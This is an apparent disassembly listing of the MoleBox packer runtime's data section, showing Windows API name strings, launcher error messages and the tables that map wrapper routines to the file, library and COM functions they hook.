aChangedisplays db 'ChangeDisplaySettingsA',0 ; DATA XREF: sub_4CE2E0:loc_4CE8D0�o
align 4
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: sub_4CE2E0+5CB�o
align 4
aLstrcmpia db 'lstrcmpiA',0 ; DATA XREF: sub_4CE2E0+5B7�o
align 4
aWritefile db 'WriteFile',0 ; DATA XREF: sub_4CE2E0+5A3�o
; sub_4D9F43+153�o
align 10h
aWidechartomult db 'WideCharToMultiByte',0 ; DATA XREF: sub_4CE2E0+58F�o
aWaitforsingleo db 'WaitForSingleObject',0 ; DATA XREF: sub_4CE2E0+57B�o
; sub_4D7494+1D4�o
aVirtualquery db 'VirtualQuery',0 ; DATA XREF: sub_4CE2E0+567�o
align 4
aVirtualprotect db 'VirtualProtect',0 ; DATA XREF: sub_4CE2E0+553�o
align 4
aVirtualfree db 'VirtualFree',0 ; DATA XREF: sub_4CE2E0+53F�o
aUnmapviewoffil db 'UnmapViewOfFile',0 ; DATA XREF: sub_4CE2E0+517�o
aUnlockfile db 'UnlockFile',0 ; DATA XREF: sub_4CE2E0+503�o
align 10h
aTerminateproce db 'TerminateProcess',0 ; DATA XREF: sub_4CE2E0+4EF�o
align 4
aSleep db 'Sleep',0 ; DATA XREF: sub_4CE2E0+4DB�o
; sub_4D7494+25E�o
align 4
aSetunhandledex db 'SetUnhandledExceptionFilter',0 ; DATA XREF: sub_4CE2E0+4C7�o
aSetlasterror db 'SetLastError',0 ; DATA XREF: sub_4CE2E0+4B3�o
align 4
aSetfilepointer db 'SetFilePointer',0 ; DATA XREF: sub_4CE2E0+49F�o
align 4
aSetevent db 'SetEvent',0 ; DATA XREF: sub_4CE2E0+48B�o
align 4
aSetenvironment db 'SetEnvironmentVariableA',0 ; DATA XREF: sub_4CE2E0+477�o
aReadfile db 'ReadFile',0 ; DATA XREF: sub_4CE2E0+463�o
align 4
aRaiseexception db 'RaiseException',0 ; DATA XREF: sub_4CE2E0+44F�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_4CE2E0+43B�o
; sub_4D7494+230�o
aMultibytetowid db 'MultiByteToWideChar',0 ; DATA XREF: sub_4CE2E0+427�o
aMapviewoffile db 'MapViewOfFile',0 ; DATA XREF: sub_4CE2E0+413�o
align 4
aLockfile db 'LockFile',0 ; DATA XREF: sub_4CE2E0+3FF�o
align 4
aLocalfree db 'LocalFree',0 ; DATA XREF: sub_4CE2E0+3EB�o
align 10h
aLocalalloc db 'LocalAlloc',0 ; DATA XREF: sub_4CE2E0+3D7�o
align 4
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_4CE2E0+3C3�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_4CE2E0+3AF�o
align 4
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_4CE2E0+39B�o
align 4
aDeletecritical db 'DeleteCriticalSection',0 ; DATA XREF: sub_4CE2E0+387�o
align 4
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_4CE2E0+373�o
align 4
aHeapcreate db 'HeapCreate',0 ; DATA XREF: sub_4CE2E0+35F�o
align 4
aHeapfree db 'HeapFree',0 ; DATA XREF: sub_4CE2E0+34B�o
align 10h
aHeapalloc db 'HeapAlloc',0 ; DATA XREF: sub_4CE2E0+337�o
align 4
aGettickcount db 'GetTickCount',0 ; DATA XREF: sub_4CE2E0+323�o
align 4
aGetversionexa db 'GetVersionExA',0 ; DATA XREF: sub_4CE2E0+30F�o
align 4
aGettemppatha db 'GetTempPathA',0 ; DATA XREF: sub_4CE2E0+2FB�o
; sub_4D7494+92�o
align 4
aGettempfilenam db 'GetTempFileNameA',0 ; DATA XREF: sub_4CE2E0+2E7�o
align 10h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0 ; DATA XREF: sub_4CE2E0+2D3�o
aGetprocaddress db 'GetProcAddress',0 ; DATA XREF: sub_4CE2E0+2BF�o
align 4
aGetprivatepr_1 db 'GetPrivateProfileStringA',0 ; DATA XREF: sub_4CE2E0+2AB�o
align 4
aGetprivatepr_0 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: sub_4CE2E0+297�o
align 4
aGetprivateprof db 'GetPrivateProfileIntA',0 ; DATA XREF: sub_4CE2E0+283�o
align 4
aGetmodulehandl db 'GetModuleHandleA',0 ; DATA XREF: sub_4CE2E0+26F�o
align 10h
aGetmodulefilen db 'GetModuleFileNameA',0 ; DATA XREF: sub_4CE2E0+25B�o
align 4
aGetlasterror db 'GetLastError',0 ; DATA XREF: sub_4CE2E0+247�o
align 4
aGetfullpathn_0 db 'GetFullPathNameW',0 ; DATA XREF: sub_4CE2E0+233�o
align 4
aGetfullpathnam db 'GetFullPathNameA',0 ; DATA XREF: sub_4CE2E0+21F�o
align 4
aGetfiletime db 'GetFileTime',0 ; DATA XREF: sub_4CE2E0+20B�o
aGetfilesize db 'GetFileSize',0 ; DATA XREF: sub_4CE2E0+1F7�o
aGetfileinforma db 'GetFileInformationByHandle',0 ; DATA XREF: sub_4CE2E0+1E3�o
align 10h
aGetfileattri_0 db 'GetFileAttributesW',0 ; DATA XREF: sub_4CE2E0+1CF�o
align 4
aGetfileattribu db 'GetFileAttributesA',0 ; DATA XREF: sub_4CE2E0+1BB�o
align 4
aGetexitcodepro db 'GetExitCodeProcess',0 ; DATA XREF: sub_4CE2E0+1A7�o
; sub_4D7494+1A6�o
align 4
aGetenvironment db 'GetEnvironmentVariableA',0 ; DATA XREF: sub_4CE2E0+193�o
aGetcurrentpr_0 db 'GetCurrentProcessId',0 ; DATA XREF: sub_4CE2E0+17F�o
; sub_4D58A0+11�o
aFreelibrary db 'FreeLibrary',0 ; DATA XREF: sub_4CE2E0+157�o
aFormatmessagea db 'FormatMessageA',0 ; DATA XREF: sub_4CE2E0+143�o
align 4
aFlushfilebuffe db 'FlushFileBuffers',0 ; DATA XREF: sub_4CE2E0+12F�o
align 4
aFindnextfilea db 'FindNextFileA',0 ; DATA XREF: sub_4CE2E0+11B�o
align 4
aFindfirstfilea db 'FindFirstFileA',0 ; DATA XREF: sub_4CE2E0+107�o
; sub_4D7494+11C�o
align 4
aFindclose db 'FindClose',0 ; DATA XREF: sub_4CE2E0+F3�o
; sub_4D7494+178�o
align 4
aExitprocess db 'ExitProcess',0 ; DATA XREF: sub_4CE2E0+DF�o
; sub_4D7494+202�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_4CE2E0+CB�o
align 4
aDeletefilea db 'DeleteFileA',0 ; DATA XREF: sub_4CE2E0+B7�o
; sub_4D7494+14A�o
aDebugbreak db 'DebugBreak',0 ; DATA XREF: sub_4CE2E0+A3�o
align 10h
aCreateprocessa db 'CreateProcessA',0 ; DATA XREF: sub_4CE2E0+8F�o
align 10h
aCreatefilema_0 db 'CreateFileMappingW',0 ; DATA XREF: sub_4CE2E0+7B�o
align 4
aCreatefilemapp db 'CreateFileMappingA',0 ; DATA XREF: sub_4CE2E0+67�o
align 4
aCreatefilew db 'CreateFileW',0 ; DATA XREF: sub_4CE2E0+53�o
aCreatefilea db 'CreateFileA',0 ; DATA XREF: sub_4CE2E0+3F�o
aClosehandle db 'CloseHandle',0 ; DATA XREF: sub_4CE2E0:loc_4CE30B�o
; sub_4D7494+28C�o
aApiNopefunc db ':API:NopeFunc',0 ; DATA XREF: sub_4DDAB0+3�o
align 4
aMbx db 'mbx',0 ; DATA XREF: sub_4CF94C+19E�o
aBoxReadcompres db ':BOX:ReadCompressedSection: decompresion failed with code %d',0
; DATA XREF: sub_4D0C5C+340�o
align 10h
a? db '\\?\',0 ; DATA XREF: sub_4D153F+56�o
align 4
dword_4E0B68 dd 98h ; DATA XREF: sub_4D2DD0+5A�w
align 10h
dword_4E0B70 dd 2 dup(0) ; DATA XREF: sub_4D0C5C+B6�o
; sub_4D0C5C+DB�o ...
dword_4E0B78 dd 0 ; DATA XREF: sub_4D0C5C+73�r
; sub_4D0C5C+F9�w ...
dword_4E0B7C dd 0 ; DATA XREF: sub_4D0C5C+63�r
; sub_4D0C5C+106�w ...
off_4E0B80 dd offset dword_4E18FC ; DATA XREF: sub_4D0C5C+84�r
; sub_4D0C5C+125�r
dd 5 dup(0)
dd offset dword_4E1900
dd 5 dup(0)
dd offset dword_4E1904
align 8
aKernel32_0 db 'kernel32',0 ; DATA XREF: sub_4D2DD0+E2�o
; sub_4DA8AA:loc_4DA995�o ...
align 4
aGetlongpathnam db 'GetLongPathNameA',0 ; DATA XREF: sub_4D2DD0+DD�o
; sub_4DAAEB+27�o
align 4
dword_4E0BD8 dd 584F424Dh ; DATA XREF: sub_4D3610:loc_4D39B0�r
; sub_4D3610+3C4�o
align 10h
dword_4E0BE0 dd 2Ah ; DATA XREF: sub_4CC06B+5A�o
dword_4E0BE4 dd 2A2E2Ah ; DATA XREF: sub_4CC06B+26�o
off_4E0BE8 dd offset aAvicap32_dll ; DATA XREF: sub_4D4AB0:loc_4D4BDD�r
; sub_4D4AB0+139�w ...
; "avicap32.dll"
aTheUncompressi db 'The uncompression error',0
aExecutable db 'EXECUTABLE',0 ; DATA XREF: sub_4D4AB0+14B�o
; sub_4D4DC0+220�o
align 10h
aTheDynamicLink db 'The dynamic link library ',27h,'%s',27h,' could not be found',0
; DATA XREF: sub_4D4AB0+123�o
align 4
aOleaout32_dll db 'oleaout32.dll',0 ; DATA XREF: sub_4D4DC0+295�o
align 4
aOleoaut32_dll db 'oleoaut32.dll',0 ; DATA XREF: sub_4D4DC0:loc_4D5041�o
align 4
aImm32_dll db 'imm32.dll',0 ; DATA XREF: sub_4D4DC0:loc_4D501F�o
; sub_4D4DC0+273�o
align 10h
loc_4E0C70: ; DATA XREF: sub_4D61E1+B67�o
pop eax
push 0FF00FF00h
push 0FF00FF00h
push 0FF00FF00h
push eax
push 0FF00FF00h
retn
; ---------------------------------------------------------------------------
align 4
dword_4E0C88 dd 6C6C642Eh, 0 ; DATA XREF: sub_4D581E+19�o
; sub_4D581E+32�o
aDProjectsMy_sr db 'D:\Projects\My.SRC\MoleStudio\MoleBox\molebox2\bootup\mbx_DLL.cpp'
; DATA XREF: sub_4D61E1+D34�o
db 0
align 4
a_box_ db '_BOX_',0 ; DATA XREF: sub_4D61E1+ADB�o
align 4
aGetcurrentdire db 'GetCurrentDirectoryA',0 ; DATA XREF: sub_4D7494+EE�o
align 4
aSetcurrentdire db 'SetCurrentDirectoryA',0 ; DATA XREF: sub_4D7494+C0�o
align 4
aMbx@X@_ db 'MBX@%X@*.###',0 ; DATA XREF: sub_4D7494+53�o
; sub_4D8892+E8�o
align 4
aStripped db '<stripped>',0 ; DATA XREF: _5:off_4DE4FC�o
align 4
aAssertionFai_0 db 'ASSERTION failed',0 ; DATA XREF: _5:off_4DE4F8�o
align 4
aMoleboxLaunche db 'MoleBox launcher fatal error',0 ; DATA XREF: _5:off_4DE4F4�o
align 4
asc_4E0D5C: ; DATA XREF: sub_4D848C+57�o
; sub_4D84F7+2D�o
dw 0Ah
unicode 0, <>,0
aErrorAtSDReaso db 'Error at %s:%d',0Ah ; DATA XREF: sub_4D848C+1E�o
db 0Ah
db 'Reason: ',0
align 4
aUp1_txt db '-up1.txt',0 ; DATA XREF: sub_4D8538:loc_4D8648�o
align 4
aUp_txt db '-up.txt',0 ; DATA XREF: sub_4D8538+BC�o
asc_4E0D90 db 0Dh,0Ah,0 ; DATA XREF: sub_4D8726+59�o
align 4
aWindowsErrorSA db 'windows error %s',0Ah ; DATA XREF: sub_4D87CA+75�o
db ' at %s(%d)',0Ah,0
align 4
aMbx@X@X_ db 'MBX@%X@%X.###',0 ; DATA XREF: sub_4D8892+C2�o
align 4
aMbx@X@X@X_ db 'MBX@%X@%X@%X.###',0 ; DATA XREF: sub_4D8892+93�o
align 4
a_ db '.###',0 ; DATA XREF: sub_4D8A16+175�o
align 10h
aMbx@ db 'MBX@',0 ; DATA XREF: sub_4D8A16+78�o
align 4
aInvalidDllRelo db 'INVALID DLL RELOCATION',0 ; DATA XREF: sub_4D8C27:loc_4D8E60�o
align 10h
aBadFuulname db 'BAD FUULNAME',0 ; DATA XREF: sub_4D8C27:loc_4D8E57�o
align 10h
aGetmodulenameE db 'GetModuleName ERROR',0 ; DATA XREF: sub_4D8C27:loc_4D8E4E�o
aHookingDllErro db 'HOOKING DLL ERROR',0 ; DATA XREF: sub_4D8C27:loc_4D8E45�o
align 4
aPackedDllOrBox db 'PACKED DLL OR BOXFILE CORRUPTED',0 ; DATA XREF: sub_4D8C27:loc_4D8E3C�o
aInvalidCompres db 'INVALID COMPRESSION/ENCRYPTION ALGORITHM',0
; DATA XREF: sub_4D8C27:loc_4D8E33�o
align 4
aDllCorrupted db 'DLL CORRUPTED',0 ; DATA XREF: sub_4D8C27:loc_4D8E2A�o
align 4
aHeapCorrupted db 'HEAP CORRUPTED',0 ; DATA XREF: sub_4D8C27:loc_4D8E21�o
align 4
aCouldNotCreate db 'COULD NOT CREATE HEAP',0 ; DATA XREF: sub_4D8C27:loc_4D8E18�o
align 4
aVirtualprote_0 db 'VIRTUALPROTECT BROKEN',0 ; DATA XREF: sub_4D8C27:loc_4D8E0F�o
align 4
aWrappersTableB db 'WRAPPERS TABLE BROKEN',0 ; DATA XREF: sub_4D8C27:loc_4D8E06�o
align 4
aOutOfMemory db 'OUT OF MEMORY',0 ; DATA XREF: sub_4D8C27:loc_4D8DFD�o
align 4
aFeatureIsNotIm db 'FEATURE IS NOT IMPLEMENTED',0 ; DATA XREF: sub_4D8C27:loc_4D8DF4�o
align 4
aBoxfileCorrupt db 'BOXFILE CORRUPTED',0 ; DATA XREF: sub_4D8C27:loc_4D8DEB�o
align 4
aReadBoxfileErr db 'READ BOXFILE ERROR',0 ; DATA XREF: sub_4D8C27:loc_4D8DE2�o
align 10h
aCouldNotOpenBo db 'COULD NOT OPEN BOXFILE',0 ; DATA XREF: sub_4D8C27:loc_4D8DD6�o
align 4
aPathIsVeryLong db 'PATH IS VERY LONG',0 ; DATA XREF: sub_4D8C27:loc_4D8DCA�o
align 4
aExecutableCorr db 'EXECUTABLE CORRUPTED',0 ; DATA XREF: sub_4D8C27:loc_4D8DBE�o
align 4
aDynamicLibrary db 'DYNAMIC LIBRARY IS NOT NT IMAGE',0 ; DATA XREF: sub_4D8C27:loc_4D8DB2�o
aExecutableIsNo db 'EXECUTABLE IS NOT NT IMAGE',0 ; DATA XREF: sub_4D8C27:loc_4D8DA6�o
align 10h
aHasNoAccessToE db 'HAS NO ACCESS TO EXECUTABLE',0 ; DATA XREF: sub_4D8C27:loc_4D8D9A�o
aAssertionFaile db 'ASSERTION FAILED',0 ; DATA XREF: sub_4D8C27:loc_4D8D8E�o
align 10h
aEsi0x08xEdi0x0 db 'ESI:0x%08X EDI:0x%08X',0 ; DATA XREF: sub_4D8C27+101�o
align 4
aEsp0x08xEbp0x0 db 'ESP:0x%08X EBP:0x%08X EIP:0x%08X',0 ; DATA XREF: sub_4D8C27+DC�o
align 4
aEax0x08xEdx0x0 db 'EAX:0x%08X EDX:0x%08X ECX:0x%08X',0 ; DATA XREF: sub_4D8C27+AB�o
align 10h
aEs0x08xFs0x08x db 'ES :0x%08X FS :0x%08X GS :0x%08X',0 ; DATA XREF: sub_4D8C27+7A�o
align 4
aCs0x08xSs0x08x db 'CS :0x%08X SS :0x%08X DS :0x%08X',0 ; DATA XREF: sub_4D8C27+49�o
align 4
a__seh__0xXAt0x db '__SEH__ 0x%x at 0x%x',0 ; DATA XREF: sub_4D8C27+18�o
align 10h
aCc7574e45e3947 db '{CC7574E4-5E39-4700-B286-269A82DD8E95}',0 ; DATA XREF: sub_4CC271+40�o
; sub_4CC271+E2�o
align 4
a_splashscreen_ db '_splashscreen.bmp',0 ; DATA XREF: sub_4CC3F3+12�o
align 4
aBroken0x08x db '!broken!0x%08x:',0 ; DATA XREF: sub_4D8EF3+FB�o
a0x08xS03x08x db '0x%08x:[%s]:(%03x:%08x)',0 ; DATA XREF: sub_4D8EF3+CA�o
aUnknown db 'unknown',0 ; DATA XREF: sub_4D8EF3+B7�o
a0x08xUnknownUn db '0x%08x:[unknown]:unknown',0 ; DATA XREF: sub_4D8EF3+60�o
align 4
aBroken db '!broken!',0 ; DATA XREF: sub_4D8EF3+31�o
align 4
a0x08x0x08x0x08 db '0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x',0 ; DATA XREF: sub_4D918E+F9�o
aStack db '--stack--',0 ; DATA XREF: sub_4D918E:loc_4D9242�o
align 4
a___OpssBrokenB db ' ... opss, broken by SEH',0 ; DATA XREF: sub_4D918E+A5�o
; sub_4D918E+11E�o
align 10h
aS_6 db ' %s',0 ; DATA XREF: sub_4D918E+47�o
; sub_4D918E+8A�o
align 4
aBacktrace db '-- backtrace --',0 ; DATA XREF: sub_4D918E+28�o
dd 2 dup(0FFFFFFFFh)
aDllgetclassobj db 'DllGetClassObject',0 ; DATA XREF: sub_4D931F+51�o
; sub_4DB076+39�o
align 8
dword_4E11C8 dd 2 dup(0) ; DATA XREF: sub_4D93B3+55�o
dd 0C0h, 46000000h
dword_4E11D8 dd 1, 0 ; DATA XREF: sub_4D93B3+11�o
dd 0C0h, 46000000h
aRegqueryvaluea db 'RegQueryValueA',0 ; DATA XREF: sub_4D9638+42�o
align 4
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0 ; DATA XREF: sub_4D9638+3D�o
align 4
aClsid08x04x04x db 'CLSID\{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}\InprocSe'
; DATA XREF: sub_4D971C+58�o
db 'rver32',0
off_4E1250 dd offset sub_4D9C54 ; DATA XREF: sub_4D9DD4+102�o
dd offset aSetunhandled_0 ; "SetUnhandledExceptionFilter"
dd offset sub_4DB2B0
dd offset aCreatefilea_0 ; "CreateFileA"
dd offset sub_4DB2FE
dd offset aCreatefilew_0 ; "CreateFileW"
dd offset sub_4DA7AF
dd offset aGetfileattri_3 ; "GetFileAttributesA"
dd offset sub_4DA7DD
dd offset aGetfileattri_4 ; "GetFileAttributesW"
dd offset sub_4DA8AA
dd offset aGetfileattri_5 ; "GetFileAttributesExW"
dd offset sub_4DB3FC
dd offset aReadfile_0 ; "ReadFile"
dd offset sub_4DB3D5
dd offset aClosehandle_0 ; "CloseHandle"
dd offset sub_4DB460
dd offset aSetfilepoint_0 ; "SetFilePointer"
dd offset sub_4DA9EC
dd offset aGetfilesize_0 ; "GetFileSize"
dd offset sub_4DA0C8
dd offset aExitprocess_1 ; "ExitProcess"
dd offset sub_4DB4A4
dd offset aCreatefilema_2 ; "CreateFileMappingA"
dd offset sub_4DB4E0
dd offset aCreatefilema_3 ; "CreateFileMappingW"
dd offset sub_4DB51C
dd offset aMapviewoffil_0 ; "MapViewOfFile"
dd offset sub_4DB55B
dd offset aUnmapviewoff_1 ; "UnmapViewOfFile"
dd offset sub_4DB18D
dd offset aFreelibrary_1 ; "FreeLibrary"
dd offset sub_4DAE83
dd offset aLoadlibrarya_0 ; "LoadLibraryA"
dd offset sub_4DAF65
dd offset aLoadlibraryw ; "LoadLibraryW"
dd offset sub_4DAE96
dd offset aLoadlibrarye_0 ; "LoadLibraryExA"
dd offset sub_4DAF78
dd offset aLoadlibraryexw ; "LoadLibraryExW"
dd offset sub_4DB076
dd offset aGetprocaddre_1 ; "GetProcAddress"
dd offset sub_4DA334
dd offset aFindfirstfil_1 ; "FindFirstFileA"
dd offset sub_4DA361
dd offset aFindfirstfilew ; "FindFirstFileW"
dd offset sub_4DA4AA
dd offset aFindfirstfilee ; "FindFirstFileExW"
; ---------------------------------------------------------------------------
jmp dword ptr [ebp-17BBFFB3h]
; ---------------------------------------------------------------------------
dw 4Dh
dd offset sub_4DA626
dd offset aFindnextfile_1 ; "FindNextFileA"
dd offset sub_4DA657
dd offset aFindnextfilew ; "FindNextFileW"
dd offset sub_4DB582
dd offset aOpenfile ; "OpenFile"
dd offset sub_4DB636
dd offset a_lopen ; "_lopen"
dd offset sub_4DB677
dd offset a_lclose ; "_lclose"
dd offset sub_4DB711
dd offset a_lread ; "_lread"
dd offset sub_4DB6CC
dd offset a_llseek ; "_llseek"
dd offset sub_4DAF8C
dd offset aGetmodulehan_1 ; "GetModuleHandleA"
dd offset sub_4DAFC6
dd offset aGetmodulehan_2 ; "GetModuleHandleW"
dd offset sub_4DA226
dd offset aSearchpathw ; "SearchPathW"
dd offset sub_4DA1C7
dd offset aSearchpatha_0 ; "SearchPathA"
dd offset sub_4DAC66
dd offset aGetprivatepr_2 ; "GetPrivateProfileStringA"
dd offset sub_4DAD0C
dd offset aGetprivatepr_3 ; "GetPrivateProfileIntA"
dd offset sub_4DAD93
dd offset aGetprivatepr_4 ; "GetPrivateProfileSectionNamesA"
dd offset sub_4DADDE
dd offset aGetprivatepr_5 ; "GetPrivateProfileSectionA"
dd offset sub_4DA710
dd offset aGetfileinfor_0 ; "GetFileInformationByHandle"
dd offset sub_4DA741
dd offset aLockfile_0 ; "LockFile"
dd offset sub_4DA77D
dd offset aUnlockfile_0 ; "UnlockFile"
dd offset sub_4DAA24
dd offset aGetmodulefil_1 ; "GetModuleFileNameA"
dd offset sub_4DAA5E
dd offset aGetmodulefil_2 ; "GetModuleFileNameW"
dd offset sub_4DAAEB
dd offset aGetlongpathn_1 ; "GetLongPathNameA"
dd offset sub_4DAB3D
dd offset aGetlongpathn_2 ; "GetLongPathNameW"
off_4E13C8 dd offset sub_4DB23E ; DATA XREF: sub_4D9DD4+116�o
dd offset aAddfontresou_0 ; "AddFontResourceA"
dd offset sub_4DB277
dd offset aRemovefontre_0 ; "RemoveFontResourceA"
off_4E13D8 dd offset sub_4DB1EA ; DATA XREF: sub_4D9DD4+12A�o
dd offset aLoadimagea_0 ; "LoadImageA"
off_4E13E0 dd offset sub_4D9518 ; DATA XREF: sub_4D9DD4+13E�o
dd offset aCocreateinstan ; "CoCreateInstance"
dd offset sub_4D9789
dd offset aCocreateinst_0 ; "CoCreateInstanceEx"
dd offset sub_4D98C0
dd offset aCogetclassobje ; "CoGetClassObject"
off_4E13F8 dd offset sub_4D9A34 ; DATA XREF: sub_4D9DD4+152�o
dd offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
dd offset sub_4D9B3C
dd offset aLoadregtypelib ; "LoadRegTypeLib"
aGetfileattri_1 db 'GetFileAttributesExW',0 ; DATA XREF: sub_4DA8AA+F0�o
align 10h
aGetlongpathn_0 db 'GetLongPathNameW',0 ; DATA XREF: sub_4DAB3D+A8�o
align 4
dword_4E1434 dd 19930520h, 4D0829h, 158h, 12E718h, 3 dup(0) ; DATA XREF: _4:004CC523�o
; sub_4CC52A+2�o
off_4E1450 dd offset word_4E145A ; DATA XREF: sub_4CC86E:loc_4CC8BD�r
; sub_4CC86E:loc_4CC8CF�r ...
dd offset word_4E145A
db 2 dup(0)
word_4E145A dw 20h ; DATA XREF: _6:off_4E1450�o
; _6:004E1454�o
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4E165C dd 1 ; DATA XREF: sub_4CC86E+3C�r
; sub_4CC9EA:loc_4CC9F2�r ...
dd 2Eh, 1, 2 dup(0)
dword_4E1670 dd 77E64C09h ; DATA XREF: sub_4CD2E0+1DF�w
; sub_4CD2E0+1F6�r ...
dword_4E1674 dd 920000h ; DATA XREF: _4:004CDED3�w _4:004CDF0F�r
dword_4E1678 dd 940000h ; DATA XREF: _4:004CDF0A�w _4:004CDF1B�r
dword_4E167C dd 930000h ; DATA XREF: _4:004CDEF4�w
dword_4E1680 dd 2 ; DATA XREF: _4:004CE0BC�r
; sub_4D4DC0+59�r ...
dword_4E1684 dd 911F18h ; DATA XREF: _4:004CE206�r
; _4:loc_4CE28F�r ...
dword_4E1688 dd 4CDB3Eh ; DATA XREF: sub_4CDE50+3�r
; _4:004CDE6F�w
dword_4E168C dd 0FFFFFFFFh ; DATA XREF: sub_4CD2E0+213�w
; sub_4CD2E0+387�r ...
dd 0
byte_4E1694 db 0 ; DATA XREF: _4:004CE2A1�w
; sub_4D581E+E�r
align 4
dword_4E1698 dd 7 ; DATA XREF: sub_4CD2E0+407�w
; sub_4D4DC0:loc_4D4E0D�r
off_4E169C dd offset a_text ; DATA XREF: sub_4CD2E0+410�w
; _4:loc_4CEC97�r ...
; ".text"
dword_4E16A0 dd 0 ; DATA XREF: sub_4CE2E0+8B3�o
dword_4E16A4 dd 77E77963h ; DATA XREF: sub_4CE2E0+3A�w
; sub_4CE2E0+881�o ...
dword_4E16A8 dd 77E7A837h ; DATA XREF: sub_4CE2E0+4E�w
; _4:004CEC0C�r ...
dword_4E16AC dd 77E779B1h ; DATA XREF: sub_4CE2E0+62�w
; sub_4DB2FE+9F�r
dword_4E16B0 dd 77E77797h ; DATA XREF: sub_4CE2E0+76�w
; _4:004CEC40�r ...
dword_4E16B4 dd 77E776D3h ; DATA XREF: sub_4CE2E0+8A�w
; sub_4DB4E0+2C�r
dword_4E16B8 dd 77E61BB8h ; DATA XREF: sub_4CE2E0+9E�w
; sub_4D71C3+E6�r
dword_4E16BC dd 77EB36A5h ; DATA XREF: sub_4CE2E0+B2�w
dword_4E16C0 dd 77E73628h ; DATA XREF: sub_4CE2E0+C6�w
; sub_4CF94C+2EA�r ...
dword_4E16C4 dd 77F7E21Fh ; DATA XREF: sub_4CE2E0+DA�w
; sub_4CF252+2A�r ...
dword_4E16C8 dd 77E75CB5h ; DATA XREF: sub_4CE2E0+EE�w
; sub_4DA0C8+AF�r
dword_4E16CC dd 77E78EAAh ; DATA XREF: sub_4CE2E0+102�w
; sub_4D2DD0+5E2�r ...
dword_4E16D0 dd 77E75D9Eh ; DATA XREF: sub_4CE2E0+116�w
; sub_4CF6DE+B4�r ...
dword_4E16D4 dd 77E75E67h ; DATA XREF: sub_4CE2E0+12A�w
; sub_4CF6DE+DC�r ...
dword_4E16D8 dd 77E73FF9h ; DATA XREF: sub_4CE2E0+13E�w
; sub_4D61E1+CFE�r
dword_4E16DC dd 77E76A60h ; DATA XREF: sub_4CE2E0+152�w
; sub_4D87CA+60�r
dword_4E16E0 dd 77E80618h ; DATA XREF: sub_4CE2E0+166�w
; sub_4D58CF+163�r ...
dword_4E16E4 dd 77E79C90h ; DATA XREF: sub_4CE2E0+17A�w
; sub_4D71C3+4B�r ...
dword_4E16E8 dd 77E80656h ; DATA XREF: sub_4CC216+15�r
; sub_4CE2E0+18E�w ...
dword_4E16EC dd 77E7AC5Eh ; DATA XREF: sub_4CE2E0+1A2�w
dword_4E16F0 dd 77E7FF65h ; DATA XREF: sub_4CE2E0+1B6�w
dword_4E16F4 dd 77E74CABh ; DATA XREF: sub_4CE2E0+1CA�w
; sub_4DA7AF+16�r
dword_4E16F8 dd 77E78536h ; DATA XREF: sub_4CE2E0+1DE�w
; sub_4DA7DD+84�r
dword_4E16FC dd 77E72EA0h ; DATA XREF: sub_4CE2E0+1F2�w
; sub_4D0858+83�r ...
dword_4E1700 dd 77E793EFh ; DATA XREF: sub_4CE2E0+206�w
; _4:004CEC21�r ...
dword_4E1704 dd 77E73CE2h ; DATA XREF: sub_4CE2E0+21A�w
; sub_4D3610+720�r
dword_4E1708 dd 77E80357h ; DATA XREF: sub_4CE2E0+22E�w
; sub_4CF252+71�r ...
dword_4E170C dd 77E781DBh ; DATA XREF: sub_4CE2E0+242�w
; sub_4DA226+92�r
dword_4E1710 dd 77F5157Dh ; DATA XREF: sub_4CE2E0+256�w
; sub_4D58CF+14E�r ...
dword_4E1714 dd 77E7A099h ; DATA XREF: sub_4CE2E0+26A�w
; _4:004CEE99�r ...
dword_4E1718 dd 77E79F93h ; DATA XREF: sub_4CC271+4C�r
; _4:004CDE79�r ...
dword_4E171C dd 77E719F3h ; DATA XREF: sub_4CE2E0+292�w
; sub_4DAD0C+76�r
dword_4E1720 dd 77E61FD2h ; DATA XREF: sub_4CE2E0+2A6�w
; sub_4DAD93+3B�r
dword_4E1724 dd 77E72C64h ; DATA XREF: sub_4CE2E0+2BA�w
; sub_4DAC66+95�r
dword_4E1728 dd 77E7A5FDh ; DATA XREF: _4:004CDEA2�r
; sub_4CE2E0+2CE�w ...
dword_4E172C dd 77E6167Bh ; DATA XREF: sub_4CE2E0+2E2�w
; sub_4D0C5C+97�r ...
dword_4E1730 dd 77E6AF8Fh ; DATA XREF: sub_4CE2E0+2F6�w
; sub_4CF94C+1A6�r
dword_4E1734 dd 77E6AD34h ; DATA XREF: sub_4CE2E0+30A�w
; sub_4CF94C+193�r ...
dword_4E1738 dd 77E7C657h ; DATA XREF: sub_4CE2E0+31E�w
dword_4E173C dd 77E7751Ah ; DATA XREF: _4:004CDEDF�r
; sub_4CE2E0+332�w
dword_4E1740 dd 77F516F8h ; DATA XREF: sub_4CE2E0+346�w
; sub_4D835A+1F�r
dword_4E1744 dd 77F51597h ; DATA XREF: sub_4CE2E0+35A�w
; sub_4D83DD+1C�r
dword_4E1748 dd 77E7C726h ; DATA XREF: sub_4CE2E0+36E�w
; sub_4D8397+16�r
dword_4E174C dd 77E79908h ; DATA XREF: sub_4CE2E0+382�w
; sub_4D2DD0+2E�r ...
dword_4E1750 dd 77F53275h ; DATA XREF: sub_4CE2E0+396�w
; sub_4DB82A+2B�r
dword_4E1754 dd 77F7E300h ; DATA XREF: sub_4CE2E0+3AA�w
; sub_4CF61F+5�r ...
dword_4E1758 dd 77E805B8h ; DATA XREF: sub_4CE2E0+3D2�w
; sub_4D61E1+17F�r
dword_4E175C dd 77E805D8h ; DATA XREF: sub_4CE2E0+3BE�w
